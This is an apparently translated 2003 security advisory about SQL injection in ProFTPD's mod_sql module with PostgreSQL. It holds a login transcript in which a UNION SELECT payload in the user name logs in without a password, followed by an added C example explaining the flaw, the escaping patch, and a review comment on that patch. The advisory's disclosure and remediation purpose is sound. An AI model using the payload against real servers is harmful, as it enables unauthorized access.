ProFTPD mod_sql SQL Injection Vulnerability

Published: 2003-06-19
Updated: 2003-06-26

Affected systems:
ProFTPD Project ProFTPD 1.2rc3
ProFTPD Project ProFTPD 1.2pre9
ProFTPD Project ProFTPD 1.2pre8
ProFTPD Project ProFTPD 1.2pre7
ProFTPD Project ProFTPD 1.2pre6
ProFTPD Project ProFTPD 1.2pre5
ProFTPD Project ProFTPD 1.2pre4
ProFTPD Project ProFTPD 1.2pre3
ProFTPD Project ProFTPD 1.2pre2
ProFTPD Project ProFTPD 1.2pre11
ProFTPD Project ProFTPD 1.2pre10
ProFTPD Project ProFTPD 1.2pre1
ProFTPD Project ProFTPD 1.2.9 rc1
ProFTPD Project ProFTPD 1.2.8
ProFTPD Project ProFTPD 1.2.7 rc3
ProFTPD Project ProFTPD 1.2.7 rc2
ProFTPD Project ProFTPD 1.2.7 rc1
ProFTPD Project ProFTPD 1.2.7
ProFTPD Project ProFTPD 1.2.6
ProFTPD Project ProFTPD 1.2.5
ProFTPD Project ProFTPD 1.2.4
ProFTPD Project ProFTPD 1.2.3
ProFTPD Project ProFTPD 1.2.2
ProFTPD Project ProFTPD 1.2.1
ProFTPD Project ProFTPD 1.2
    - Conectiva Linux 7.0
    - Conectiva Linux 6.0
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Mandrake Linux 8.2
    - Mandrake Linux 8.1
    - Mandrake Linux 8.0
    - Mandrake Linux 7.2
Description:
BUGTRAQ  ID: 7974

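ProFTPD is an open-source FTP server.

ProFTPD is vulnerable to SQL injection when it uses the mod_sql module with a PostgreSQL database. A remote attacker can exploit this by supplying malicious SQL commands while logging in to the FTP server, possibly gaining unauthorized access to the FTP server.

By entering malicious SQL commands in the user name and password fields, an attacker can alter the logic of the original SQL statement and gain access to the FTP server without a password.

<*Source: runlevel (runlevel@linuxmail.org)
  *>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

runlevel (runlevel@linuxmail.org) provided the following test method: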

Name (localhost:runlevel): ')UNION SELECT
'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''='
331 Password required for ')UNION.
Password:
230 User ')UNION SELECT 'u','p',1001,1001,'/tmp'
,'/bin/bash' WHERE(''=' logged in.
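
Why the login above changes the query, and why the quote escaping applied by the patch in the recommendations keeps it inside one string literal, as an added example (not ProFTPD code and not part of the original advisory). The query template is an assumption about how mod_sql embeds the user name, `escape_literal` is a simplified stand-in for libpq's `PQescapeString()`, and `breaks_out` and `build_query` are hypothetical helpers.

```c
#include <stdio.h>
#include <string.h>
/* Assumed query shape, not quoted from mod_sql: user name inside '...'. */
#define USER_QUERY "SELECT userid, passwd, uid, gid, homedir, shell " \
                   "FROM users WHERE (userid='%s')"

static const char PAGE_LOGIN[] = /* user name from the transcript above */
  "')UNION SELECT 'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''='";

/* Simplified stand-in for PQescapeString(): doubles ' and \, dst >= 2*len+1. */
static size_t escape_literal(char *dst, const char *src, size_t len) {
  char *p = dst;
  for (size_t i = 0; i < len; i++) {
    if (src[i] == '\'' || src[i] == '\\') *p++ = src[i];
    *p++ = src[i];
  }
  *p = '\0';
  return (size_t)(p - dst);
}

/* 1 if value, placed between '...', ends the literal early; otherwise 0. */
static int breaks_out(const char *value) {
  for (size_t i = 0; value[i] != '\0'; i++) {
    if (value[i] == '\\') {
      if (value[++i] == '\0') return 1; /* would swallow the closing quote */
    } else if (value[i] == '\'') {
      if (value[++i] != '\'') return 1; /* unpaired quote closes the literal */
    }
  }
  return 0;
}

/* escape=0 mirrors the removed #else branch; returns breaks_out() or -1. */
static int build_query(char *out, size_t outlen, const char *user, int escape) {
  char lit[512];
  size_t len = strlen(user);
  if (len * 2 + 1 > sizeof(lit)) return -1;
  if (escape) escape_literal(lit, user, len);
  else memcpy(lit, user, len + 1);
  if (snprintf(out, outlen, USER_QUERY, lit) >= (int)outlen) return -1;
  return breaks_out(lit);
}

int main(void) {
  char q[1024];
  for (int e = 0; e <= 1; e++)
    printf("%d %d %s\n", e, build_query(q, sizeof(q), PAGE_LOGIN, e), q);
  return 0;
}
```

Without escaping, the first quote of the user name closes the literal and the rest is parsed as SQL; with escaping, every quote is doubled and the whole string is compared as data.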

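Recommendations:
Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:

* Apply the following patch. Note that it requires PostgreSQL 7.2 or later; with an older version, mod_sql_postgres will fail: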

Index: contrib/mod_sql_postgres.c
===================================================================
RCS file: /cvsroot/proftp/proftpd/contrib/mod_sql_postgres.c,v
retrieving revision 1.15
diff -u -r1.15 mod_sql_postgres.c
--- contrib/mod_sql_postgres.c 29 May 2003 07:29:43 -0000 1.15
+++ contrib/mod_sql_postgres.c 17 Jun 2003 20:52:30 -0000
@@ -1105,23 +1105,13 @@
conn = (db_conn_t *) entry->data;

/* Note: the PQescapeString() function appeared in the C API as of
- * Postgres-7.2; this macro allows for functioning with older postgres
- * installations. Unfortunately, Postgres' PG_VERSION is defined as
- * a string, not an actual number, which makes for preprocessor-time checking
- * of that value much harder.
- *
- * Ideally, this function could be detected by a configure script, but
- * ProFTPD does not yet support per-module configure scripts.
+ * Postgres-7.2.
*/
-#ifndef POSTGRES_NO_PQESCAPESTRING
unescaped = cmd->argv[1];
escaped = (char *) pcalloc(cmd->tmp_pool, sizeof(char) *
(strlen(unescaped) * 2) + 1);

PQescapeString(escaped, unescaped, strlen(unescaped));
-#else
- escaped = cmd->argv[1];
-#endif

sql_log(DEBUG_FUNC, "%s", "exiting \tpostgres cmd_escapestring");
return mod_create_data(cmd, (void *) escaped);
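
Review bot: the shortened comment above `unescaped = cmd->argv[1];` still reads as a historical remark ("appeared in the C API as of Postgres-7.2"), although with the `#ifndef POSTGRES_NO_PQESCAPESTRING` guard gone, a libpq that provides `PQescapeString()` is now a hard build requirement. State that in the comment and in the module's build notes, so that a build against older client libraries fails for a reason the administrator can look up instead of an unexplained missing `PQescapeString` symbol. Dropping the `#else` branch itself is right, since it handed `cmd->argv[1]` back unescaped.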

Vendor patch:

ProFTPD Project
---------------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.proftpd.org/

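This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.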